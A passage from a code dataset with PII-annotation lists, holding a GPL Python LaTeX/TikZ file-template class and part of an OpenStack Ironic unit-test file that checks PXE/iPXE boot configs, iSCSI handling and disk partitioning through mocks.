'result.me'], ['URL', 'request.me'], ['URL', 'result.ge'], ['URL', 'APP.ro'], ['URL', 'Resource.query.fi'], ['URL', 'request.re'], ['URL', 'views.ge'], ['URL', 'resource.re'], ['URL', 'Recipient.ge'], ['URL', 'g.user.us'], ['URL', 'resource.ht'], ['URL', 'g.cu'], ['URL', 'ResourceAuth.ge'], ['URL', 'APP.ro'], ['URL', 'Resource.query.fi'], ['URL', 'g.user.ro'], ['URL', 'g.user.us'], ['URL', 'resource.owner.us'], ['URL', 'DB.session.de'], ['URL', 'DB.session.com'], ['URL', 'DB.session.ro'], ['URL', 'APP.ro'], ['URL', 'Factory.cr'], ['URL', 'views.ge'], ['URL', 'obj.ge'], ['URL', 'obj.ge'], ['URL', 'obj.ge'], ['URL', 'Factory.cr'], ['URL', 'obj.ge'], ['URL', 'form.ht'], ['URL', 'g.cu'], ['URL', 'APP.ro'], ['URL', 'Factory.cr'], ['URL', 'obj.ge'], ['URL', 'obj.ge'], ['URL', 'form.ht'], ['URL', 'g.cu'], ['URL', 'APP.ro'], ['URL', 'request.me'], ['URL', 'login.ht'], ['URL', 'request.fo'], ['URL', 'request.fo'], ['URL', 'User.query.fi'], ['URL', 'user.pa'], ['URL', 'user.au'], ['URL', 'request.ar'], ['URL', 'request.args.ge'], ['URL', 'request.re'], ['URL', 'request.re'], ['URL', 'request.me'], ['URL', 'request.ht'], ['URL', 'request.fo'], ['URL', 'User.query.fi'], ['URL', 'user.ge'], ['URL', 'g.cu'], ['URL', 'msg.as'], ['URL', 'request.args.ge'], ['URL', 'User.ve'], ['URL', 'request.me'], ['URL', 'form.ht'], ['URL', 'request.fo'], ['URL', 'user.se'], ['URL', 'DB.session.ad'], ['URL', 'DB.session.com'], ['URL', 'DB.session.ro'], ['URL', 
'APP.ro'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'views.ge'], ['URL', 'summary.ge'], ['URL', 'obj.fo'], ['URL', 'resource.fo'], ['URL', 'g.cu'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'views.ge'], ['URL', 'views.ge'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'views.ge'], ['URL', 'views.ge'], ['URL', 'run.id'], ['URL', 'run.su'], ['URL', 'run.re'], ['URL', 'run.ch'], ['URL', 'run.me'], ['URL', 'run.re'], ['URL', 'runs.ht'], ['URL', 'g.cu'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'APP.ru']]" +32,"# Copyright 2012 (C) Mickael Menu dummy@email.com +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation; either version 2 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License along +# with this program. If not, see <http://www.gnu.org/licenses/>. + +from string import Template + +from .tags import * + + +class FileTemplate(object): + """""" + The file template tool generates a full LaTeX/TikZ source from a template, preamble + and source. + """""" + def __init__(self, template, preamble, source): + assert preamble is not None and source is not None + super(FileTemplate, self).__init__() + self.content = """" + self.preamble = preamble + self.source = source + self.latex_template = Template(template) + + def buildFileContent(self): + """""" + Builds the TikZ document with given preamble and source and the document template. + """""" + self._buildPreambleChunk() + self._buildSourceChunk() + self._buildContentFromTemplate() + return self.content + + def _buildPreambleChunk(self): + self.preamble = ""%s\n%s\n%s\n"" % (PREAMBLE_BEGIN_TAG, self.preamble, PREAMBLE_END_TAG) + + def _buildSourceChunk(self): + self.source = ""%s\n%s\n%s\n"" % (SOURCE_BEGIN_TAG, self.source, SOURCE_END_TAG) + + def _buildContentFromTemplate(self): + self.content = TIKZ_TAG + ""\n"" + self.content += self.latex_template.safe_substitute(PREAMBLE=self.preamble, SOURCE=self.source) +",1771,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['NRP', 'SOURCE_BEGIN_TAG'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'self.co'], ['URL', 'self.pr'], ['URL', 'self.so'], ['URL', 'self.la'], ['URL', 'self.co'], ['URL', 'self.pr'], ['URL', 'self.pr'], ['URL', 'self.so'], ['URL', 'self.so'], ['URL', 'self.co'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'template.sa'], ['URL', 'self.pr'], ['URL', 'self.so']]" +33,"# Copyright (c) 2012 NTT DOCOMO, INC. +# Copyright 2011 OpenStack Foundation +# Copyright 2011 Ilya Alekseyev +# +# Licensed under the Apache License, Version 2.0 (the ""License""); you may +# not use this file except in compliance with the License. You may obtain +# a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an ""AS IS"" BASIS, WITHOUT +# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the +# License for the specific language governing permissions and limitations +# under the License. 
+ +import base64 +import gzip +import os +import shutil +import stat +import tempfile +import time +import types + +import mock +from oslo_concurrency import processutils +from oslo_config import cfg +from oslo_utils import uuidutils +import requests +import testtools + +from ironic.common import boot_devices +from ironic.common import disk_partitioner +from ironic.common import exception +from ironic.common import images +from ironic.common import states +from ironic.common import utils as common_utils +from ironic.conductor import task_manager +from ironic.conductor import utils as manager_utils +from ironic.drivers.modules import agent_client +from ironic.drivers.modules import deploy_utils as utils +from ironic.drivers.modules import image_cache +from ironic.tests import base as tests_base +from ironic.tests.conductor import utils as mgr_utils +from ironic.tests.db import base as db_base +from ironic.tests.db import utils as db_utils +from ironic.tests.objects import utils as obj_utils + +_PXECONF_DEPLOY = b"""""" +default deploy + +label deploy +kernel deploy_kernel +append initrd=deploy_ramdisk +ipappend 3 + +label boot_partition +kernel kernel +append initrd=ramdisk root={{ ROOT }} + +label boot_whole_disk +COM32 chain.c32 +append mbr:{{ DISK_IDENTIFIER }} +"""""" + +_PXECONF_BOOT_PARTITION = """""" +default boot_partition + +label deploy +kernel deploy_kernel +append initrd=deploy_ramdisk +ipappend 3 + +label boot_partition +kernel kernel +append initrd=ramdisk root=UUID=12345678-1234-1234-1234-1234567890abcdef + +label boot_whole_disk +COM32 chain.c32 +append mbr:{{ DISK_IDENTIFIER }} +"""""" + +_PXECONF_BOOT_WHOLE_DISK = """""" +default boot_whole_disk + +label deploy +kernel deploy_kernel +append initrd=deploy_ramdisk +ipappend 3 + +label boot_partition +kernel kernel +append initrd=ramdisk root={{ ROOT }} + +label boot_whole_disk +COM32 chain.c32 +append mbr:0x12345678 +"""""" + +_IPXECONF_DEPLOY = b"""""" +#!ipxe + +dhcp + +goto deploy + +:deploy +kernel deploy_kernel +initrd deploy_ramdisk +boot + +:boot_partition +kernel kernel +append initrd=ramdisk root={{ ROOT }} +boot + +:boot_whole_disk +kernel chain.c32 +append mbr:{{ DISK_IDENTIFIER }} +boot +"""""" + +_IPXECONF_BOOT_PARTITION = """""" +#!ipxe + +dhcp + +goto boot_partition + +:deploy +kernel deploy_kernel +initrd deploy_ramdisk +boot + +:boot_partition +kernel kernel +append initrd=ramdisk root=UUID=12345678-1234-1234-1234-1234567890abcdef +boot + +:boot_whole_disk +kernel chain.c32 +append mbr:{{ DISK_IDENTIFIER }} +boot +"""""" + +_IPXECONF_BOOT_WHOLE_DISK = """""" +#!ipxe + +dhcp + +goto boot_whole_disk + +:deploy +kernel deploy_kernel +initrd deploy_ramdisk +boot + +:boot_partition +kernel kernel +append initrd=ramdisk root={{ ROOT }} +boot + +:boot_whole_disk +kernel chain.c32 +append mbr:0x12345678 +boot +"""""" + +_UEFI_PXECONF_DEPLOY = b"""""" +default=deploy + +image=deploy_kernel + label=deploy + initrd=deploy_ramdisk + append=""ro text"" + +image=kernel + label=boot_partition + initrd=ramdisk + append=""root={{ ROOT }}"" + +image=chain.c32 + label=boot_whole_disk + append=""mbr:{{ DISK_IDENTIFIER }}"" +"""""" + +_UEFI_PXECONF_BOOT_PARTITION = """""" +default=boot_partition + +image=deploy_kernel + label=deploy + initrd=deploy_ramdisk + append=""ro text"" + +image=kernel + label=boot_partition + initrd=ramdisk + append=""root=UUID=12345678-1234-1234-1234-1234567890abcdef"" + +image=chain.c32 + label=boot_whole_disk + append=""mbr:{{ DISK_IDENTIFIER }}"" +"""""" + +_UEFI_PXECONF_BOOT_WHOLE_DISK = """""" 
+default=boot_whole_disk + +image=deploy_kernel + label=deploy + initrd=deploy_ramdisk + append=""ro text"" + +image=kernel + label=boot_partition + initrd=ramdisk + append=""root={{ ROOT }}"" + +image=chain.c32 + label=boot_whole_disk + append=""mbr:0x12345678"" +"""""" + + +@mock.patch.object(time, 'sleep', lambda seconds: None) +class PhysicalWorkTestCase(tests_base.TestCase): + + def _mock_calls(self, name_list): + patch_list = [mock.patch.object(utils, name, + spec_set=types.FunctionType) + for name in name_list] + mock_list = [patcher.start() for patcher in patch_list] + for patcher in patch_list: + self.addCleanup(patcher.stop) + + parent_mock = mock.MagicMock(spec=[]) + for mocker, name in zip(mock_list, name_list): + parent_mock.attach_mock(mocker, name) + return parent_mock + + def _test_deploy_partition_image(self, boot_option=None, boot_mode=None): + """"""Check loosely all functions are called with right args."""""" + address = '127.0.0.1' + port = 3306 + iqn = 'iqn.xyz' + lun = 1 + image_path = '/tmp/xyz/image' + root_mb = 128 + swap_mb = 64 + ephemeral_mb = 0 + ephemeral_format = None + configdrive_mb = 0 + node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz"" + + dev = '/dev/fake' + swap_part = '/dev/fake-part1' + root_part = '/dev/fake-part2' + root_uuid = '12345678-1234-1234-12345678-12345678abcdef' + + name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi', + 'logout_iscsi', 'delete_iscsi', 'make_partitions', + 'is_block_device', 'populate_image', 'mkfs', + 'block_uuid', 'notify', 'destroy_disk_metadata'] + parent_mock = self._mock_calls(name_list) + parent_mock.get_dev.return_value = dev + parent_mock.get_image_mb.return_value = 1 + parent_mock.is_block_device.return_value = True + parent_mock.block_uuid.return_value = root_uuid + parent_mock.make_partitions.return_value = {'root': root_part, + 'swap': swap_part} + + make_partitions_expected_args = [dev, root_mb, swap_mb, ephemeral_mb, + configdrive_mb] + make_partitions_expected_kwargs = {'commit': True} + deploy_kwargs = {} + + if boot_option: + make_partitions_expected_kwargs['boot_option'] = boot_option + deploy_kwargs['boot_option'] = boot_option + else: + make_partitions_expected_kwargs['boot_option'] = 'netboot' + + if boot_mode: + make_partitions_expected_kwargs['boot_mode'] = boot_mode + deploy_kwargs['boot_mode'] = boot_mode + else: + make_partitions_expected_kwargs['boot_mode'] = 'bios' + + # If no boot_option, then it should default to netboot. 
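+ # Every helper was attached to a single parent mock in _mock_calls, + # so parent_mock.mock_calls records the exact order the helpers ran + # in for the assertion below.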
+ calls_expected = [mock.call.get_image_mb(image_path), + mock.call.get_dev(address, port, iqn, lun), + mock.call.discovery(address, port), + mock.call.login_iscsi(address, port, iqn), + mock.call.is_block_device(dev), + mock.call.destroy_disk_metadata(dev, node_uuid), + mock.call.make_partitions( + *make_partitions_expected_args, + **make_partitions_expected_kwargs), + mock.call.is_block_device(root_part), + mock.call.is_block_device(swap_part), + mock.call.populate_image(image_path, root_part), + mock.call.mkfs(dev=swap_part, fs='swap', + label='swap1'), + mock.call.block_uuid(root_part), + mock.call.logout_iscsi(address, port, iqn), + mock.call.delete_iscsi(address, port, iqn)] + + uuids_dict_returned = utils.deploy_partition_image( + address, port, iqn, lun, image_path, root_mb, swap_mb, + ephemeral_mb, ephemeral_format, node_uuid, **deploy_kwargs) + + self.assertEqual(calls_expected, parent_mock.mock_calls) + expected_uuid_dict = { + 'root uuid': root_uuid, + 'efi system partition uuid': None} + self.assertEqual(expected_uuid_dict, uuids_dict_returned) + + def test_deploy_partition_image_without_boot_option(self): + self._test_deploy_partition_image() + + def test_deploy_partition_image_netboot(self): + self._test_deploy_partition_image(boot_option=""netboot"") + + def test_deploy_partition_image_localboot(self): + self._test_deploy_partition_image(boot_option=""local"") + + def test_deploy_partition_image_wo_boot_option_and_wo_boot_mode(self): + self._test_deploy_partition_image() + + def test_deploy_partition_image_netboot_bios(self): + self._test_deploy_partition_image(boot_option=""netboot"", + boot_mode=""bios"") + + def test_deploy_partition_image_localboot_bios(self): + self._test_deploy_partition_image(boot_option=""local"", + boot_mode=""bios"") + + def test_deploy_partition_image_netboot_uefi(self): + self._test_deploy_partition_image(boot_option=""netboot"", + boot_mode=""uefi"") + + @mock.patch.object(utils, 'get_image_mb', return_value=129, autospec=True) + def test_deploy_partition_image_image_exceeds_root_partition(self, + gim_mock): + address = '127.0.0.1' + port = 3306 + iqn = 'iqn.xyz' + lun = 1 + image_path = '/tmp/xyz/image' + root_mb = 128 + swap_mb = 64 + ephemeral_mb = 0 + ephemeral_format = None + node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz"" + + self.assertRaises(exception.InstanceDeployFailure, + utils.deploy_partition_image, address, port, iqn, + lun, image_path, root_mb, swap_mb, ephemeral_mb, + ephemeral_format, node_uuid) + + gim_mock.assert_called_once_with(image_path) + + # We mock utils.block_uuid separately here because we can't predict + # the order in which it will be called. 
+ @mock.patch.object(utils, 'block_uuid', autospec=True) + def test_deploy_partition_image_localboot_uefi(self, block_uuid_mock): + """"""Check loosely all functions are called with right args."""""" + address = '127.0.0.1' + port = 3306 + iqn = 'iqn.xyz' + lun = 1 + image_path = '/tmp/xyz/image' + root_mb = 128 + swap_mb = 64 + ephemeral_mb = 0 + ephemeral_format = None + configdrive_mb = 0 + node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz"" + + dev = '/dev/fake' + swap_part = '/dev/fake-part2' + root_part = '/dev/fake-part3' + efi_system_part = '/dev/fake-part1' + root_uuid = '12345678-1234-1234-12345678-12345678abcdef' + efi_system_part_uuid = '9036-482' + + name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi', + 'logout_iscsi', 'delete_iscsi', 'make_partitions', + 'is_block_device', 'populate_image', 'mkfs', + 'notify', 'destroy_disk_metadata'] + parent_mock = self._mock_calls(name_list) + parent_mock.get_dev.return_value = dev + parent_mock.get_image_mb.return_value = 1 + parent_mock.is_block_device.return_value = True + + def block_uuid_side_effect(device): + if device == root_part: + return root_uuid + if device == efi_system_part: + return efi_system_part_uuid + + block_uuid_mock.side_effect = block_uuid_side_effect + parent_mock.make_partitions.return_value = { + 'root': root_part, 'swap': swap_part, + 'efi system partition': efi_system_part} + + # If no boot_option, then it should default to netboot. + calls_expected = [mock.call.get_image_mb(image_path), + mock.call.get_dev(address, port, iqn, lun), + mock.call.discovery(address, port), + mock.call.login_iscsi(address, port, iqn), + mock.call.is_block_device(dev), + mock.call.destroy_disk_metadata(dev, node_uuid), + mock.call.make_partitions(dev, root_mb, swap_mb, + ephemeral_mb, + configdrive_mb, + commit=True, + boot_option=""local"", + boot_mode=""uefi""), + mock.call.is_block_device(root_part), + mock.call.is_block_device(swap_part), + mock.call.is_block_device(efi_system_part), + mock.call.mkfs(dev=efi_system_part, fs='vfat', + label='efi-part'), + mock.call.populate_image(image_path, root_part), + mock.call.mkfs(dev=swap_part, fs='swap', + label='swap1'), + mock.call.logout_iscsi(address, port, iqn), + mock.call.delete_iscsi(address, port, iqn)] + + uuid_dict_returned = utils.deploy_partition_image( + address, port, iqn, lun, image_path, root_mb, swap_mb, + ephemeral_mb, ephemeral_format, node_uuid, boot_option=""local"", + boot_mode=""uefi"") + + self.assertEqual(calls_expected, parent_mock.mock_calls) + block_uuid_mock.assert_any_call('/dev/fake-part1') + block_uuid_mock.assert_any_call('/dev/fake-part3') + expected_uuid_dict = { + 'root uuid': root_uuid, + 'efi system partition uuid': efi_system_part_uuid} + self.assertEqual(expected_uuid_dict, uuid_dict_returned) + + def test_deploy_partition_image_without_swap(self): + """"""Check loosely all functions are called with right args."""""" + address = '127.0.0.1' + port = 3306 + iqn = 'iqn.xyz' + lun = 1 + image_path = '/tmp/xyz/image' + root_mb = 128 + swap_mb = 0 + ephemeral_mb = 0 + ephemeral_format = None + configdrive_mb = 0 + node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz"" + + dev = '/dev/fake' + root_part = '/dev/fake-part1' + root_uuid = '12345678-1234-1234-12345678-12345678abcdef' + + name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi', + 'logout_iscsi', 'delete_iscsi', 'make_partitions', + 'is_block_device', 'populate_image', 'block_uuid', + 'notify', 'destroy_disk_metadata'] + parent_mock = 
self._mock_calls(name_list) + parent_mock.get_dev.return_value = dev + parent_mock.get_image_mb.return_value = 1 + parent_mock.is_block_device.return_value = True + parent_mock.block_uuid.return_value = root_uuid + parent_mock.make_partitions.return_value = {'root': root_part} + calls_expected = [mock.call.get_image_mb(image_path), + mock.call.get_dev(address, port, iqn, lun), + mock.call.discovery(address, port), + mock.call.login_iscsi(address, port, iqn), + mock.call.is_block_device(dev), + mock.call.destroy_disk_metadata(dev, node_uuid), + mock.call.make_partitions(dev, root_mb, swap_mb, + ephemeral_mb, + configdrive_mb, + commit=True, + boot_option=""netboot"", + boot_mode=""bios""), + mock.call.is_block_device(root_part), + mock.call.populate_image(image_path, root_part), + mock.call.block_uuid(root_part), + mock.call.logout_iscsi(address, port, iqn), + mock.call.delete_iscsi(address, port, iqn)] + + uuid_dict_returned = utils.deploy_partition_image(address, port, iqn, + lun, image_path, + root_mb, swap_mb, + ephemeral_mb, + ephemeral_format, + node_uuid) + + self.assertEqual(calls_expected, parent_mock.mock_calls) + self.assertEqual(root_uuid, uuid_dict_returned['root uuid']) + + def test_deploy_partition_image_with_ephemeral(self): + """"""Check loosely all functions are called with right args."""""" + address = '127.0.0.1' + port = 3306 + iqn = 'iqn.xyz' + lun = 1 + image_path = '/tmp/xyz/image' + root_mb = 128 + swap_mb = 64 + ephemeral_mb = 256 + configdrive_mb = 0 + ephemeral_format = 'exttest' + node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz"" + + dev = '/dev/fake' + ephemeral_part = '/dev/fake-part1' + swap_part = '/dev/fake-part2' + root_part = '/dev/fake-part3' + root_uuid = '12345678-1234-1234-12345678-12345678abcdef' + + name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi', + 'logout_iscsi', 'delete_iscsi', 'make_partitions', + 'is_block_device', 'populate_image', 'mkfs', + 'block_uuid', 'notify', 'destroy_disk_metadata'] + parent_mock = self._mock_calls(name_list) + parent_mock.get_dev.return_value = dev + parent_mock.get_image_mb.return_value = 1 + parent_mock.is_block_device.return_value = True + parent_mock.block_uuid.return_value = root_uuid + parent_mock.make_partitions.return_value = {'swap': swap_part, + 'ephemeral': ephemeral_part, + 'root': root_part} + calls_expected = [mock.call.get_image_mb(image_path), + mock.call.get_dev(address, port, iqn, lun), + mock.call.discovery(address, port), + mock.call.login_iscsi(address, port, iqn), + mock.call.is_block_device(dev), + mock.call.destroy_disk_metadata(dev, node_uuid), + mock.call.make_partitions(dev, root_mb, swap_mb, + ephemeral_mb, + configdrive_mb, + commit=True, + boot_option=""netboot"", + boot_mode=""bios""), + mock.call.is_block_device(root_part), + mock.call.is_block_device(swap_part), + mock.call.is_block_device(ephemeral_part), + mock.call.populate_image(image_path, root_part), + mock.call.mkfs(dev=swap_part, fs='swap', + label='swap1'), + mock.call.mkfs(dev=ephemeral_part, + fs=ephemeral_format, + label='ephemeral0'), + mock.call.block_uuid(root_part), + mock.call.logout_iscsi(address, port, iqn), + mock.call.delete_iscsi(address, port, iqn)] + + uuid_dict_returned = utils.deploy_partition_image(address, port, iqn, + lun, image_path, + root_mb, swap_mb, + ephemeral_mb, + ephemeral_format, + node_uuid) + + self.assertEqual(calls_expected, parent_mock.mock_calls) + self.assertEqual(root_uuid, uuid_dict_returned['root uuid']) + + def 
test_deploy_partition_image_preserve_ephemeral(self): + """"""Check if all functions are called with right args."""""" + address = '127.0.0.1' + port = 3306 + iqn = 'iqn.xyz' + lun = 1 + image_path = '/tmp/xyz/image' + root_mb = 128 + swap_mb = 64 + ephemeral_mb = 256 + ephemeral_format = 'exttest' + configdrive_mb = 0 + node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz"" + + dev = '/dev/fake' + ephemeral_part = '/dev/fake-part1' + swap_part = '/dev/fake-part2' + root_part = '/dev/fake-part3' + root_uuid = '12345678-1234-1234-12345678-12345678abcdef' + + name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi', + 'logout_iscsi', 'delete_iscsi', 'make_partitions', + 'is_block_device', 'populate_image', 'mkfs', + 'block_uuid', 'notify', 'get_dev_block_size'] + parent_mock = self._mock_calls(name_list) + parent_mock.get_dev.return_value = dev + parent_mock.get_image_mb.return_value = 1 + parent_mock.is_block_device.return_value = True + parent_mock.block_uuid.return_value = root_uuid + parent_mock.make_partitions.return_value = {'swap': swap_part, + 'ephemeral': ephemeral_part, + 'root': root_part} + parent_mock.block_uuid.return_value = root_uuid + calls_expected = [mock.call.get_image_mb(image_path), + mock.call.get_dev(address, port, iqn, lun), + mock.call.discovery(address, port), + mock.call.login_iscsi(address, port, iqn), + mock.call.is_block_device(dev), + mock.call.make_partitions(dev, root_mb, swap_mb, + ephemeral_mb, + configdrive_mb, + commit=False, + boot_option=""netboot"", + boot_mode=""bios""), + mock.call.is_block_device(root_part), + mock.call.is_block_device(swap_part), + mock.call.is_block_device(ephemeral_part), + mock.call.populate_image(image_path, root_part), + mock.call.mkfs(dev=swap_part, fs='swap', + label='swap1'), + mock.call.block_uuid(root_part), + mock.call.logout_iscsi(address, port, iqn), + mock.call.delete_iscsi(address, port, iqn)] + + uuid_dict_returned = utils.deploy_partition_image( + address, port, iqn, lun, image_path, root_mb, swap_mb, + ephemeral_mb, ephemeral_format, node_uuid, + preserve_ephemeral=True, boot_option=""netboot"") + self.assertEqual(calls_expected, parent_mock.mock_calls) + self.assertFalse(parent_mock.get_dev_block_size.called) + self.assertEqual(root_uuid, uuid_dict_returned['root uuid']) + + @mock.patch.object(common_utils, 'unlink_without_raise', autospec=True) + def test_deploy_partition_image_with_configdrive(self, mock_unlink): + """"""Check loosely all functions are called with right args."""""" + address = '127.0.0.1' + port = 3306 + iqn = 'iqn.xyz' + lun = 1 + image_path = '/tmp/xyz/image' + root_mb = 128 + swap_mb = 0 + ephemeral_mb = 0 + configdrive_mb = 10 + ephemeral_format = None + node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz"" + configdrive_url = 'http://127.0.0.1/cd' + + dev = '/dev/fake' + configdrive_part = '/dev/fake-part1' + root_part = '/dev/fake-part2' + root_uuid = '12345678-1234-1234-12345678-12345678abcdef' + + name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi', + 'logout_iscsi', 'delete_iscsi', 'make_partitions', + 'is_block_device', 'populate_image', 'block_uuid', + 'notify', 'destroy_disk_metadata', 'dd', + '_get_configdrive'] + parent_mock = self._mock_calls(name_list) + parent_mock.get_dev.return_value = dev + parent_mock.get_image_mb.return_value = 1 + parent_mock.is_block_device.return_value = True + parent_mock.block_uuid.return_value = root_uuid + parent_mock.make_partitions.return_value = {'root': root_part, + 'configdrive': + configdrive_part} + 
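+ # _get_configdrive is stubbed to report a 10 MB image at a local + # path, so no real configdrive content is fetched during the test.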
parent_mock._get_configdrive.return_value = (10, 'configdrive-path') + calls_expected = [mock.call.get_image_mb(image_path), + mock.call.get_dev(address, port, iqn, lun), + mock.call.discovery(address, port), + mock.call.login_iscsi(address, port, iqn), + mock.call.is_block_device(dev), + mock.call.destroy_disk_metadata(dev, node_uuid), + mock.call._get_configdrive(configdrive_url, + node_uuid), + mock.call.make_partitions(dev, root_mb, swap_mb, + ephemeral_mb, + configdrive_mb, + commit=True, + boot_option=""netboot"", + boot_mode=""bios""), + mock.call.is_block_device(root_part), + mock.call.is_block_device(configdrive_part), + mock.call.dd(mock.ANY, configdrive_part), + mock.call.populate_image(image_path, root_part), + mock.call.block_uuid(root_part), + mock.call.logout_iscsi(address, port, iqn), + mock.call.delete_iscsi(address, port, iqn)] + + uuid_dict_returned = utils.deploy_partition_image( + address, port, iqn, lun, image_path, root_mb, swap_mb, + ephemeral_mb, ephemeral_format, node_uuid, + configdrive=configdrive_url) + + self.assertEqual(calls_expected, parent_mock.mock_calls) + self.assertEqual(root_uuid, uuid_dict_returned['root uuid']) + mock_unlink.assert_called_once_with('configdrive-path') + + @mock.patch.object(utils, 'get_disk_identifier', autospec=True) + def test_deploy_whole_disk_image(self, mock_gdi): + """"""Check loosely all functions are called with right args."""""" + address = '127.0.0.1' + port = 3306 + iqn = 'iqn.xyz' + lun = 1 + image_path = '/tmp/xyz/image' + node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz"" + + dev = '/dev/fake' + name_list = ['get_dev', 'discovery', 'login_iscsi', 'logout_iscsi', + 'delete_iscsi', 'is_block_device', 'populate_image', + 'notify'] + parent_mock = self._mock_calls(name_list) + parent_mock.get_dev.return_value = dev + parent_mock.is_block_device.return_value = True + mock_gdi.return_value = '0x12345678' + calls_expected = [mock.call.get_dev(address, port, iqn, lun), + mock.call.discovery(address, port), + mock.call.login_iscsi(address, port, iqn), + mock.call.is_block_device(dev), + mock.call.populate_image(image_path, dev), + mock.call.logout_iscsi(address, port, iqn), + mock.call.delete_iscsi(address, port, iqn)] + + uuid_dict_returned = utils.deploy_disk_image(address, port, iqn, lun, + image_path, node_uuid) + + self.assertEqual(calls_expected, parent_mock.mock_calls) + self.assertEqual('0x12345678', uuid_dict_returned['disk identifier']) + + @mock.patch.object(common_utils, 'execute', autospec=True) + def test_verify_iscsi_connection_raises(self, mock_exec): + iqn = 'iqn.xyz' + mock_exec.return_value = ['iqn.abc', ''] + self.assertRaises(exception.InstanceDeployFailure, + utils.verify_iscsi_connection, iqn) + self.assertEqual(3, mock_exec.call_count) + + @mock.patch.object(os.path, 'exists', autospec=True) + def test_check_file_system_for_iscsi_device_raises(self, mock_os): + iqn = 'iqn.xyz' + ip = ""127.0.0.1"" + port = ""22"" + mock_os.return_value = False + self.assertRaises(exception.InstanceDeployFailure, + utils.check_file_system_for_iscsi_device, ip, port, iqn) + self.assertEqual(3, mock_os.call_count) + + @mock.patch.object(os.path, 'exists', autospec=True) + def test_check_file_system_for_iscsi_device(self, mock_os): + iqn = 'iqn.xyz' + ip = ""127.0.0.1"" + port = ""22"" + check_dir = ""/dev/disk/by-path/ip-%s:%s-iscsi-%s-lun-1"" % (ip, + port, + iqn) + + mock_os.return_value = True + utils.check_file_system_for_iscsi_device(ip, port, iqn) + mock_os.assert_called_once_with(check_dir) + + 
@mock.patch.object(common_utils, 'execute', autospec=True) + def test_verify_iscsi_connection(self, mock_exec): + iqn = 'iqn.xyz' + mock_exec.return_value = ['iqn.xyz', ''] + utils.verify_iscsi_connection(iqn) + mock_exec.assert_called_once_with('iscsiadm', + '-m', 'node', + '-S', + run_as_root=True, + check_exit_code=[0]) + + @mock.patch.object(common_utils, 'execute', autospec=True) + def test_force_iscsi_lun_update(self, mock_exec): + iqn = 'iqn.xyz' + utils.force_iscsi_lun_update(iqn) + mock_exec.assert_called_once_with('iscsiadm', + '-m', 'node', + '-T', iqn, + '-R', + run_as_root=True, + check_exit_code=[0]) + + @mock.patch.object(common_utils, 'execute', autospec=True) + @mock.patch.object(utils, 'verify_iscsi_connection', autospec=True) + @mock.patch.object(utils, 'force_iscsi_lun_update', autospec=True) + @mock.patch.object(utils, 'check_file_system_for_iscsi_device', + autospec=True) + def test_login_iscsi_calls_verify_and_update(self, + mock_check_dev, + mock_update, + mock_verify, + mock_exec): + address = '127.0.0.1' + port = 3306 + iqn = 'iqn.xyz' + mock_exec.return_value = ['iqn.xyz', ''] + utils.login_iscsi(address, port, iqn) + mock_exec.assert_called_once_with('iscsiadm', + '-m', 'node', + '-p', '%s:%s' % (address, port), + '-T', iqn, + '--login', + run_as_root=True, + check_exit_code=[0], + attempts=5, + delay_on_retry=True) + + mock_verify.assert_called_once_with(iqn) + + mock_update.assert_called_once_with(iqn) + + mock_check_dev.assert_called_once_with(address, port, iqn) + + @mock.patch.object(utils, 'is_block_device', lambda d: True) + def test_always_logout_and_delete_iscsi(self): + """"""Check if logout_iscsi() and delete_iscsi() are called. + + Make sure that logout_iscsi() and delete_iscsi() are called once + login_iscsi() is invoked. 
+ + """""" + address = '127.0.0.1' + port = 3306 + iqn = 'iqn.xyz' + lun = 1 + image_path = '/tmp/xyz/image' + root_mb = 128 + swap_mb = 64 + ephemeral_mb = 256 + ephemeral_format = 'exttest' + node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz"" + + dev = '/dev/fake' + + class TestException(Exception): + pass + + name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi', + 'logout_iscsi', 'delete_iscsi', 'work_on_disk'] + patch_list = [mock.patch.object(utils, name, + spec_set=types.FunctionType) + for name in name_list] + mock_list = [patcher.start() for patcher in patch_list] + for patcher in patch_list: + self.addCleanup(patcher.stop) + + parent_mock = mock.MagicMock(spec=[]) + for mocker, name in zip(mock_list, name_list): + parent_mock.attach_mock(mocker, name) + + parent_mock.get_dev.return_value = dev + parent_mock.get_image_mb.return_value = 1 + parent_mock.work_on_disk.side_effect = TestException + calls_expected = [mock.call.get_image_mb(image_path), + mock.call.get_dev(address, port, iqn, lun), + mock.call.discovery(address, port), + mock.call.login_iscsi(address, port, iqn), + mock.call.work_on_disk(dev, root_mb, swap_mb, + ephemeral_mb, + ephemeral_format, image_path, + node_uuid, configdrive=None, + preserve_ephemeral=False, + boot_option=""netboot"", + boot_mode=""bios""), + mock.call.logout_iscsi(address, port, iqn), + mock.call.delete_iscsi(address, port, 